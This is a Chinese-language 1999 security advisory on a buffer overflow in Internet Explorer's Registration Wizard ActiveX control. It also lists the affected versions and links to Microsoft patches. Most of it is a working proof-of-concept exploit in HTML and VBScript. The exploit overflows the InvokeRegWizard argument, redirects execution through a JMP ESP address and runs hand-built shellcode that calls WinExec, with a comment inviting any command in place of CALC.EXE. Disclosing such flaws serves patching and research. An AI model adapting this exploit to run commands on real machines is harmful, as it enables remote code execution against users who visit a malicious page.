MS IE的注册向导存在安全漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:客户机模式 受影响系统 IE4.01 FOR WIN95,NT4.0;\NIE5.0 FOR WIN95/98/NT详细描述 在INTERNET的Explorer注册向导(regwizc.dll)中存在一个缓冲溢出漏洞,这个控件中被标明为'Safe for Scripting'.可被恶意者利用此控件来执行两进制代码 测试代码 REGWIZC The Registration Wizard control used by Microsoft to register MS products also contains a buffer overrun in the 'InvokeRegWizard' method. When called with a long string, pre-pended with '/i', we can gain control of the RET address and exploit the control in a similar manner as the PDF control. This exploit will cause a 'Regwiz.log' file to be created in the temporary directory, and once again will execute CALC.EXE and terminate the host. ;gtobject classid="clsid:50E5E3D1-C07E-11D0-B9FD- 00A0249F6B00" id="RegWizObj"> ;gt/object> <script language="VbScript" ><!-- msgbox("Registration Wizard Buffer Overrun" + Chr (10) + "Written by Shane Hird") expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 'We overflowed to the RET point of the stack 'No NULL's allowed so ret to <JMP ESP> in Shell32 expstr = expstr & Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP expstr = expstr & Chr(53) 'You may need to use a different address expstr = expstr & Chr(208) expstr = expstr & Chr(127) 'NOP for debugging purposes expstr = expstr + Chr(144) 'MOV EDI, ESP expstr = expstr + Chr(139) + Chr(252) 'ADD EDI, 19 (Size of code) expstr = expstr + Chr(131) + Chr(199) + Chr(25) 'PUSH EAX (Window Style EAX = 41414141) expstr = expstr + Chr(80) 'PUSH EDI (Address of command line) expstr = expstr + Chr(87) 'MOV EDX, BFFA0960 (WinExec, Win98) expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191) 'CALL EDX expstr = expstr + Chr(255) + Chr(210) 'XOR EAX, EAX expstr = expstr + Chr(51) + Chr(192) 'PUSH EAX expstr = expstr + Chr(80) 'MOV EDX, BFF8D4CA (ExitProcess, Win98) expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191) 'CALL EDX expstr = expstr + Chr(255) + Chr(210) 'Replace with any command + 0 (automatically appended) expstr = expstr + "CALC.EXE" RegWizObj.InvokeRegWizard(expstr) --></script> 解决方案 下载补丁: Internet Explorer 4.01 for Intel: ftp://ftp.microsoft.com/peropsys/ie/ie- public/fixes/usa/IE401/ImportExportFavorites- fix/x86/q241361.exe - Internet Explorer 4.01 for Alpha: ftp://ftp.microsoft.com/peropsys/ie/ie- public/fixes/usa/IE401/ImportExportFavorites- fix/Alpha/q241361.exe - Internet Explorer 5 for Intel: ftp://ftp.microsoft.com/peropsys/ie/ie- public/fixes/usa/IE50/ImportExportFavorites- fix/x86/q241361.exe - Internet Explorer 5 for Alpha: ftp://ftp.microsoft.com/peropsys/ie/ie- public/fixes/usa/IE50/ImportExportFavorites- fix/Alpha/q241361.exe 相关信息 |
